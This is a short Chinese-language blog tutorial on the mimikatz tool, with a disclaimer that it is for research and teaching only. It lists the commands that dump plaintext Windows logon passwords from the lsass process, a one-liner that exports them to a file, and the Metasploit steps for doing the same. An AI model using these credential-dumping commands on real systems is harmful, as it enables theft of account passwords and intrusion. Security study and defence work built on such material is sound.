mimikatz介绍

mimikatz是法国人Gentil Kiwi编写的一款windows平台下的神器,它具备很多功能,其中最亮的功能是直接从 lsass.exe 进程里获取windows处于active状态账号的明文密码。mimikatz的功能不仅如此,它还可以提升进程权限,注入进程,读取进程内存等等,mimikatz包含了很多本地模块,更像是一个轻量级的调试器。

mimikatz下载安装

实验环境

 2008 Server R2

mimikatz还支持以下系统

Windows XP (部分可以)
Windows Server 2003
Windows Server 2008
Windows Vista
Windows 7
Windows 7 SP1

使用

运行mimikatz.exe 需要用管理员权限运行

分别输入 privilege::debug 和 sekurlsa::logonpasswords

然后下来我们可以看到已经获取到明文密码了

不管密码多么复杂都能抓出来

原因是在llsass中,明文密码经过加密算法的密文 (这个加密算法是可逆的 能被解密出明文)

也可以用 mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> password.txt 命令来导出到本地文件。

msf建立连接后也可以使用mimikatz输入load mimikatz 然后输入wdigest就可以获取明文密码

最后修改:2022 年 10 月 20 日
  • 本文作者:Juneha
  • 本文链接:https://blog.mo60.cn/index.php/archives/14.html
  • 版权声明:本博客所有文章除特别声明外,均默认采用 CC BY-NC-SA 4.0 许可协议。
  • 文章声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任,本人坚决反对利用文章内容进行恶意攻击行为,推荐大家在了解技术原理的前提下,更好的维护个人信息安全、企业安全、国家安全。
如果觉得我的文章对你有用,请随意赞赏